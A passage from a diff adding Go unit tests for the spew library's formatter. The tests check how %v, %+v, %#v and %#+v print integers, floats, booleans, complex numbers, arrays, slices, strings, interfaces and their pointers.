+	addFormatterTest("%#+v", &pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")"+v4s)
+	addFormatterTest("%#+v", nv4, "(*"+v4t+")"+"<nil>")
+
+	// Max int.
+	v5 := int(2147483647)
+	nv5 := (*int)(nil)
+	pv5 := &v5
+	v5Addr := fmt.Sprintf("%p", pv5)
+	pv5Addr := fmt.Sprintf("%p", &pv5)
+	v5t := "int"
+	v5s := "2147483647"
+	addFormatterTest("%v", v5, v5s)
+	addFormatterTest("%v", pv5, "<*>"+v5s)
+	addFormatterTest("%v", &pv5, "<**>"+v5s)
+	addFormatterTest("%v", nv5, "<nil>")
+	addFormatterTest("%+v", v5, v5s)
+	addFormatterTest("%+v", pv5, "<*>("+v5Addr+")"+v5s)
+	addFormatterTest("%+v", &pv5, "<**>("+pv5Addr+"->"+v5Addr+")"+v5s)
+	addFormatterTest("%+v", nv5, "<nil>")
+	addFormatterTest("%#v", v5, "("+v5t+")"+v5s)
+	addFormatterTest("%#v", pv5, "(*"+v5t+")"+v5s)
+	addFormatterTest("%#v", &pv5, "(**"+v5t+")"+v5s)
+	addFormatterTest("%#v", nv5, "(*"+v5t+")"+"<nil>")
+	addFormatterTest("%#+v", v5, "("+v5t+")"+v5s)
+	addFormatterTest("%#+v", pv5, "(*"+v5t+")("+v5Addr+")"+v5s)
+	addFormatterTest("%#+v", &pv5, "(**"+v5t+")("+pv5Addr+"->"+v5Addr+")"+v5s)
+	addFormatterTest("%#+v", nv5, "(*"+v5t+")"+"<nil>")
+}
+
+func addUintFormatterTests() {
+	// Max uint8.
+	v := uint8(255)
+	nv := (*uint8)(nil)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "uint8"
+	vs := "255"
+	addFormatterTest("%v", v, vs)
+	addFormatterTest("%v", pv, "<*>"+vs)
+	addFormatterTest("%v", &pv, "<**>"+vs)
+	addFormatterTest("%v", nv, "<nil>")
+	addFormatterTest("%+v", v, vs)
+	addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+	addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+	addFormatterTest("%+v", nv, "<nil>")
+	addFormatterTest("%#v", v, "("+vt+")"+vs)
+	addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+	addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+	addFormatterTest("%#v", nv, "(*"+vt+")"+"<nil>")
+	addFormatterTest("%#+v", v, "("+vt+")"+vs)
+	addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+	addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+	addFormatterTest("%#+v", nv, "(*"+vt+")"+"<nil>")
+
+	// Max uint16.
+	v2 := uint16(65535)
+	nv2 := (*uint16)(nil)
+	pv2 := &v2
+	v2Addr := fmt.Sprintf("%p", pv2)
+	pv2Addr := fmt.Sprintf("%p", &pv2)
+	v2t := "uint16"
+	v2s := "65535"
+	addFormatterTest("%v", v2, v2s)
+	addFormatterTest("%v", pv2, "<*>"+v2s)
+	addFormatterTest("%v", &pv2, "<**>"+v2s)
+	addFormatterTest("%v", nv2, "<nil>")
+	addFormatterTest("%+v", v2, v2s)
+	addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s)
+	addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s)
+	addFormatterTest("%+v", nv2, "<nil>")
+	addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+	addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s)
+	addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s)
+	addFormatterTest("%#v", nv2, "(*"+v2t+")"+"<nil>")
+	addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+	addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s)
+	addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s)
+	addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"<nil>")
+
+	// Max uint32.
+	v3 := uint32(4294967295)
+	nv3 := (*uint32)(nil)
+	pv3 := &v3
+	v3Addr := fmt.Sprintf("%p", pv3)
+	pv3Addr := fmt.Sprintf("%p", &pv3)
+	v3t := "uint32"
+	v3s := "4294967295"
+	addFormatterTest("%v", v3, v3s)
+	addFormatterTest("%v", pv3, "<*>"+v3s)
+	addFormatterTest("%v", &pv3, "<**>"+v3s)
+	addFormatterTest("%v", nv3, "<nil>")
+	addFormatterTest("%+v", v3, v3s)
+	addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s)
+	addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s)
+	addFormatterTest("%+v", nv3, "<nil>")
+	addFormatterTest("%#v", v3, "("+v3t+")"+v3s)
+	addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s)
+	addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s)
+	addFormatterTest("%#v", nv3, "(*"+v3t+")"+"<nil>")
+	addFormatterTest("%#+v", v3, "("+v3t+")"+v3s)
+	addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s)
+	addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s)
+	addFormatterTest("%#v", nv3, "(*"+v3t+")"+"<nil>")
+
+	// Max uint64.
+	v4 := uint64(18446744073709551615)
+	nv4 := (*uint64)(nil)
+	pv4 := &v4
+	v4Addr := fmt.Sprintf("%p", pv4)
+	pv4Addr := fmt.Sprintf("%p", &pv4)
+	v4t := "uint64"
+	v4s := "18446744073709551615"
+	addFormatterTest("%v", v4, v4s)
+	addFormatterTest("%v", pv4, "<*>"+v4s)
+	addFormatterTest("%v", &pv4, "<**>"+v4s)
+	addFormatterTest("%v", nv4, "<nil>")
+	addFormatterTest("%+v", v4, v4s)
+	addFormatterTest("%+v", pv4, "<*>("+v4Addr+")"+v4s)
+	addFormatterTest("%+v", &pv4, "<**>("+pv4Addr+"->"+v4Addr+")"+v4s)
+	addFormatterTest("%+v", nv4, "<nil>")
+	addFormatterTest("%#v", v4, "("+v4t+")"+v4s)
+	addFormatterTest("%#v", pv4, "(*"+v4t+")"+v4s)
+	addFormatterTest("%#v", &pv4, "(**"+v4t+")"+v4s)
+	addFormatterTest("%#v", nv4, "(*"+v4t+")"+"<nil>")
+	addFormatterTest("%#+v", v4, "("+v4t+")"+v4s)
+	addFormatterTest("%#+v", pv4, "(*"+v4t+")("+v4Addr+")"+v4s)
+	addFormatterTest("%#+v", &pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")"+v4s)
+	addFormatterTest("%#+v", nv4, "(*"+v4t+")"+"<nil>")
+
+	// Max uint.
+	v5 := uint(4294967295)
+	nv5 := (*uint)(nil)
+	pv5 := &v5
+	v5Addr := fmt.Sprintf("%p", pv5)
+	pv5Addr := fmt.Sprintf("%p", &pv5)
+	v5t := "uint"
+	v5s := "4294967295"
+	addFormatterTest("%v", v5, v5s)
+	addFormatterTest("%v", pv5, "<*>"+v5s)
+	addFormatterTest("%v", &pv5, "<**>"+v5s)
+	addFormatterTest("%v", nv5, "<nil>")
+	addFormatterTest("%+v", v5, v5s)
+	addFormatterTest("%+v", pv5, "<*>("+v5Addr+")"+v5s)
+	addFormatterTest("%+v", &pv5, "<**>("+pv5Addr+"->"+v5Addr+")"+v5s)
+	addFormatterTest("%+v", nv5, "<nil>")
+	addFormatterTest("%#v", v5, "("+v5t+")"+v5s)
+	addFormatterTest("%#v", pv5, "(*"+v5t+")"+v5s)
+	addFormatterTest("%#v", &pv5, "(**"+v5t+")"+v5s)
+	addFormatterTest("%#v", nv5, "(*"+v5t+")"+"<nil>")
+	addFormatterTest("%#+v", v5, "("+v5t+")"+v5s)
+	addFormatterTest("%#+v", pv5, "(*"+v5t+")("+v5Addr+")"+v5s)
+	addFormatterTest("%#+v", &pv5, "(**"+v5t+")("+pv5Addr+"->"+v5Addr+")"+v5s)
+	addFormatterTest("%#v", nv5, "(*"+v5t+")"+"<nil>")
+}
+
+func addBoolFormatterTests() {
+	// Boolean true.
+	v := bool(true)
+	nv := (*bool)(nil)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "bool"
+	vs := "true"
+	addFormatterTest("%v", v, vs)
+	addFormatterTest("%v", pv, "<*>"+vs)
+	addFormatterTest("%v", &pv, "<**>"+vs)
+	addFormatterTest("%v", nv, "<nil>")
+	addFormatterTest("%+v", v, vs)
+	addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+	addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+	addFormatterTest("%+v", nv, "<nil>")
+	addFormatterTest("%#v", v, "("+vt+")"+vs)
+	addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+	addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+	addFormatterTest("%#v", nv, "(*"+vt+")"+"<nil>")
+	addFormatterTest("%#+v", v, "("+vt+")"+vs)
+	addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+	addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+	addFormatterTest("%#+v", nv, "(*"+vt+")"+"<nil>")
+
+	// Boolean false.
+	v2 := bool(false)
+	pv2 := &v2
+	v2Addr := fmt.Sprintf("%p", pv2)
+	pv2Addr := fmt.Sprintf("%p", &pv2)
+	v2t := "bool"
+	v2s := "false"
+	addFormatterTest("%v", v2, v2s)
+	addFormatterTest("%v", pv2, "<*>"+v2s)
+	addFormatterTest("%v", &pv2, "<**>"+v2s)
+	addFormatterTest("%+v", v2, v2s)
+	addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s)
+	addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s)
+	addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+	addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s)
+	addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s)
+	addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+	addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s)
+	addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s)
+}
+
+func addFloatFormatterTests() {
+	// Standard float32.
+	v := float32(3.1415)
+	nv := (*float32)(nil)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "float32"
+	vs := "3.1415"
+	addFormatterTest("%v", v, vs)
+	addFormatterTest("%v", pv, "<*>"+vs)
+	addFormatterTest("%v", &pv, "<**>"+vs)
+	addFormatterTest("%v", nv, "<nil>")
+	addFormatterTest("%+v", v, vs)
+	addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+	addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+	addFormatterTest("%+v", nv, "<nil>")
+	addFormatterTest("%#v", v, "("+vt+")"+vs)
+	addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+	addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+	addFormatterTest("%#v", nv, "(*"+vt+")"+"<nil>")
+	addFormatterTest("%#+v", v, "("+vt+")"+vs)
+	addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+	addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+	addFormatterTest("%#+v", nv, "(*"+vt+")"+"<nil>")
+
+	// Standard float64.
+	v2 := float64(3.1415926)
+	nv2 := (*float64)(nil)
+	pv2 := &v2
+	v2Addr := fmt.Sprintf("%p", pv2)
+	pv2Addr := fmt.Sprintf("%p", &pv2)
+	v2t := "float64"
+	v2s := "3.1415926"
+	addFormatterTest("%v", v2, v2s)
+	addFormatterTest("%v", pv2, "<*>"+v2s)
+	addFormatterTest("%v", &pv2, "<**>"+v2s)
+	addFormatterTest("%+v", nv2, "<nil>")
+	addFormatterTest("%+v", v2, v2s)
+	addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s)
+	addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s)
+	addFormatterTest("%+v", nv2, "<nil>")
+	addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+	addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s)
+	addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s)
+	addFormatterTest("%#v", nv2, "(*"+v2t+")"+"<nil>")
+	addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+	addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s)
+	addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s)
+	addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"<nil>")
+}
+
+func addComplexFormatterTests() {
+	// Standard complex64.
+	v := complex(float32(6), -2)
+	nv := (*complex64)(nil)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "complex64"
+	vs := "(6-2i)"
+	addFormatterTest("%v", v, vs)
+	addFormatterTest("%v", pv, "<*>"+vs)
+	addFormatterTest("%v", &pv, "<**>"+vs)
+	addFormatterTest("%+v", nv, "<nil>")
+	addFormatterTest("%+v", v, vs)
+	addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+	addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+	addFormatterTest("%+v", nv, "<nil>")
+	addFormatterTest("%#v", v, "("+vt+")"+vs)
+	addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+	addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+	addFormatterTest("%#v", nv, "(*"+vt+")"+"<nil>")
+	addFormatterTest("%#+v", v, "("+vt+")"+vs)
+	addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+	addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+	addFormatterTest("%#+v", nv, "(*"+vt+")"+"<nil>")
+
+	// Standard complex128.
+	v2 := complex(float64(-6), 2)
+	nv2 := (*complex128)(nil)
+	pv2 := &v2
+	v2Addr := fmt.Sprintf("%p", pv2)
+	pv2Addr := fmt.Sprintf("%p", &pv2)
+	v2t := "complex128"
+	v2s := "(-6+2i)"
+	addFormatterTest("%v", v2, v2s)
+	addFormatterTest("%v", pv2, "<*>"+v2s)
+	addFormatterTest("%v", &pv2, "<**>"+v2s)
+	addFormatterTest("%+v", nv2, "<nil>")
+	addFormatterTest("%+v", v2, v2s)
+	addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s)
+	addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s)
+	addFormatterTest("%+v", nv2, "<nil>")
+	addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+	addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s)
+	addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s)
+	addFormatterTest("%#v", nv2, "(*"+v2t+")"+"<nil>")
+	addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+	addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s)
+	addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s)
+	addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"<nil>")
+}
+
+func addArrayFormatterTests() {
+	// Array containing standard ints.
+	v := [3]int{1, 2, 3}
+	nv := (*[3]int)(nil)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "[3]int"
+	vs := "[1 2 3]"
+	addFormatterTest("%v", v, vs)
+	addFormatterTest("%v", pv, "<*>"+vs)
+	addFormatterTest("%v", &pv, "<**>"+vs)
+	addFormatterTest("%+v", nv, "<nil>")
+	addFormatterTest("%+v", v, vs)
+	addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+	addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+	addFormatterTest("%+v", nv, "<nil>")
+	addFormatterTest("%#v", v, "("+vt+")"+vs)
+	addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+	addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+	addFormatterTest("%#v", nv, "(*"+vt+")"+"<nil>")
+	addFormatterTest("%#+v", v, "("+vt+")"+vs)
+	addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+	addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+	addFormatterTest("%#+v", nv, "(*"+vt+")"+"<nil>")
+
+	// Array containing type with custom formatter on pointer receiver only.
+	v2 := [3]pstringer{"1", "2", "3"}
+	nv2 := (*[3]pstringer)(nil)
+	pv2 := &v2
+	v2Addr := fmt.Sprintf("%p", pv2)
+	pv2Addr := fmt.Sprintf("%p", &pv2)
+	v2t := "[3]spew_test.pstringer"
+	v2sp := "[stringer 1 stringer 2 stringer 3]"
+	v2s := v2sp
+	if spew.UnsafeDisabled {
+		v2s = "[1 2 3]"
+	}
+	addFormatterTest("%v", v2, v2s)
+	addFormatterTest("%v", pv2, "<*>"+v2sp)
+	addFormatterTest("%v", &pv2, "<**>"+v2sp)
+	addFormatterTest("%+v", nv2, "<nil>")
+	addFormatterTest("%+v", v2, v2s)
+	addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2sp)
+	addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2sp)
+	addFormatterTest("%+v", nv2, "<nil>")
+	addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+	addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2sp)
+	addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2sp)
+	addFormatterTest("%#v", nv2, "(*"+v2t+")"+"<nil>")
+	addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+	addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2sp)
+	addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2sp)
+	addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"<nil>")
+
+	// Array containing interfaces.
+	v3 := [3]interface{}{"one", int(2), uint(3)}
+	nv3 := (*[3]interface{})(nil)
+	pv3 := &v3
+	v3Addr := fmt.Sprintf("%p", pv3)
+	pv3Addr := fmt.Sprintf("%p", &pv3)
+	v3t := "[3]interface {}"
+	v3t2 := "string"
+	v3t3 := "int"
+	v3t4 := "uint"
+	v3s := "[one 2 3]"
+	v3s2 := "[(" + v3t2 + ")one (" + v3t3 + ")2 (" + v3t4 + ")3]"
+	addFormatterTest("%v", v3, v3s)
+	addFormatterTest("%v", pv3, "<*>"+v3s)
+	addFormatterTest("%v", &pv3, "<**>"+v3s)
+	addFormatterTest("%+v", nv3, "<nil>")
+	addFormatterTest("%+v", v3, v3s)
+	addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s)
+	addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s)
+	addFormatterTest("%+v", nv3, "<nil>")
+	addFormatterTest("%#v", v3, "("+v3t+")"+v3s2)
+	addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s2)
+	addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s2)
+	addFormatterTest("%#v", nv3, "(*"+v3t+")"+"<nil>")
+	addFormatterTest("%#+v", v3, "("+v3t+")"+v3s2)
+	addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s2)
+	addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s2)
+	addFormatterTest("%#+v", nv3, "(*"+v3t+")"+"<nil>")
+}
+
+func addSliceFormatterTests() {
+	// Slice containing standard float32 values.
+	v := []float32{3.14, 6.28, 12.56}
+	nv := (*[]float32)(nil)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "[]float32"
+	vs := "[3.14 6.28 12.56]"
+	addFormatterTest("%v", v, vs)
+	addFormatterTest("%v", pv, "<*>"+vs)
+	addFormatterTest("%v", &pv, "<**>"+vs)
+	addFormatterTest("%+v", nv, "<nil>")
+	addFormatterTest("%+v", v, vs)
+	addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+	addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+	addFormatterTest("%+v", nv, "<nil>")
+	addFormatterTest("%#v", v, "("+vt+")"+vs)
+	addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+	addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+	addFormatterTest("%#v", nv, "(*"+vt+")"+"<nil>")
+	addFormatterTest("%#+v", v, "("+vt+")"+vs)
+	addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+	addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+	addFormatterTest("%#+v", nv, "(*"+vt+")"+"<nil>")
+
+	// Slice containing type with custom formatter on pointer receiver only.
+	v2 := []pstringer{"1", "2", "3"}
+	nv2 := (*[]pstringer)(nil)
+	pv2 := &v2
+	v2Addr := fmt.Sprintf("%p", pv2)
+	pv2Addr := fmt.Sprintf("%p", &pv2)
+	v2t := "[]spew_test.pstringer"
+	v2s := "[stringer 1 stringer 2 stringer 3]"
+	addFormatterTest("%v", v2, v2s)
+	addFormatterTest("%v", pv2, "<*>"+v2s)
+	addFormatterTest("%v", &pv2, "<**>"+v2s)
+	addFormatterTest("%+v", nv2, "<nil>")
+	addFormatterTest("%+v", v2, v2s)
+	addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s)
+	addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s)
+	addFormatterTest("%+v", nv2, "<nil>")
+	addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+	addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s)
+	addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s)
+	addFormatterTest("%#v", nv2, "(*"+v2t+")"+"<nil>")
+	addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+	addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s)
+	addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s)
+	addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"<nil>")
+
+	// Slice containing interfaces.
+	v3 := []interface{}{"one", int(2), uint(3), nil}
+	nv3 := (*[]interface{})(nil)
+	pv3 := &v3
+	v3Addr := fmt.Sprintf("%p", pv3)
+	pv3Addr := fmt.Sprintf("%p", &pv3)
+	v3t := "[]interface {}"
+	v3t2 := "string"
+	v3t3 := "int"
+	v3t4 := "uint"
+	v3t5 := "interface {}"
+	v3s := "[one 2 3 <nil>]"
+	v3s2 := "[(" + v3t2 + ")one (" + v3t3 + ")2 (" + v3t4 + ")3 (" + v3t5 +
+		")<nil>]"
+	addFormatterTest("%v", v3, v3s)
+	addFormatterTest("%v", pv3, "<*>"+v3s)
+	addFormatterTest("%v", &pv3, "<**>"+v3s)
+	addFormatterTest("%+v", nv3, "<nil>")
+	addFormatterTest("%+v", v3, v3s)
+	addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s)
+	addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s)
+	addFormatterTest("%+v", nv3, "<nil>")
+	addFormatterTest("%#v", v3, "("+v3t+")"+v3s2)
+	addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s2)
+	addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s2)
+	addFormatterTest("%#v", nv3, "(*"+v3t+")"+"<nil>")
+	addFormatterTest("%#+v", v3, "("+v3t+")"+v3s2)
+	addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s2)
+	addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s2)
+	addFormatterTest("%#+v", nv3, "(*"+v3t+")"+"<nil>")
+
+	// Nil slice.
+	var v4 []int
+	nv4 := (*[]int)(nil)
+	pv4 := &v4
+	v4Addr := fmt.Sprintf("%p", pv4)
+	pv4Addr := fmt.Sprintf("%p", &pv4)
+	v4t := "[]int"
+	v4s := "<nil>"
+	addFormatterTest("%v", v4, v4s)
+	addFormatterTest("%v", pv4, "<*>"+v4s)
+	addFormatterTest("%v", &pv4, "<**>"+v4s)
+	addFormatterTest("%+v", nv4, "<nil>")
+	addFormatterTest("%+v", v4, v4s)
+	addFormatterTest("%+v", pv4, "<*>("+v4Addr+")"+v4s)
+	addFormatterTest("%+v", &pv4, "<**>("+pv4Addr+"->"+v4Addr+")"+v4s)
+	addFormatterTest("%+v", nv4, "<nil>")
+	addFormatterTest("%#v", v4, "("+v4t+")"+v4s)
+	addFormatterTest("%#v", pv4, "(*"+v4t+")"+v4s)
+	addFormatterTest("%#v", &pv4, "(**"+v4t+")"+v4s)
+	addFormatterTest("%#v", nv4, "(*"+v4t+")"+"<nil>")
+	addFormatterTest("%#+v", v4, "("+v4t+")"+v4s)
+	addFormatterTest("%#+v", pv4, "(*"+v4t+")("+v4Addr+")"+v4s)
+	addFormatterTest("%#+v", &pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")"+v4s)
+	addFormatterTest("%#+v", nv4, "(*"+v4t+")"+"<nil>")
+}
+
+func addStringFormatterTests() {
+	// Standard string.
+	v := "test"
+	nv := (*string)(nil)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "string"
+	vs := "test"
+	addFormatterTest("%v", v, vs)
+	addFormatterTest("%v", pv, "<*>"+vs)
+	addFormatterTest("%v", &pv, "<**>"+vs)
+	addFormatterTest("%+v", nv, "<nil>")
+	addFormatterTest("%+v", v, vs)
+	addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+	addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+	addFormatterTest("%+v", nv, "<nil>")
+	addFormatterTest("%#v", v, "("+vt+")"+vs)
+	addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+	addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+	addFormatterTest("%#v", nv, "(*"+vt+")"+"<nil>")
+	addFormatterTest("%#+v", v, "("+vt+")"+vs)
+	addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+	addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+	addFormatterTest("%#+v", nv, "(*"+vt+")"+"<nil>")
+}
+
+func addInterfaceFormatterTests() {
+	// Nil interface.
+	var v interface{}
+	nv := (*interface{})(nil)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "interface {}"
+	vs := "<nil>"
+	addFormatterTest("%v", v, vs)
+	addFormatterTest("%v", pv, "<*>"+vs)
+	addFormatterTest("%v", &pv, "<**>"+vs)
+	addFormatterTest("%+v", nv, "<nil>")
+	addFormatterTest("%+v", v, vs)
+	addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+	addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+	addFormatterTest("%+v", nv, "<nil>")
+	addFormatterTest("%#v", v, "("+vt+")"+vs)
+	addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+	addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+	addFormatterTest("%#v", nv, "(*"+vt+")"+"<nil>")
+	addFormatterTest("%#+v", v, "("+vt+")"+vs)
+	addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+	addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+	addFormatterTest("%#+v", nv, "(*"+vt+")"+"<nil>")
+
+	// Sub-interface.
+	v2 := interface{}(uint16(65535))
+	pv2 := &v2
+	v2Addr := fmt.Sprintf("%p", pv2)
+	pv2Addr := fmt.Sprintf("%p", &pv2)
+	v2t := "uint16"
+	v2s := "65535"
+	addFormatterTest("%v", v2, v2s)
+	addFormatterTest("%v", pv2, "<*>"+v2s)
+	addFormatterTest("%v", &pv2, "<**>"+v2s)
+	addFormatterTest("%+v", v2, v2s)
+	addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s)
+	addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s)
+	addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+	addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s)
+	addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s)
+	addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+	addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s)
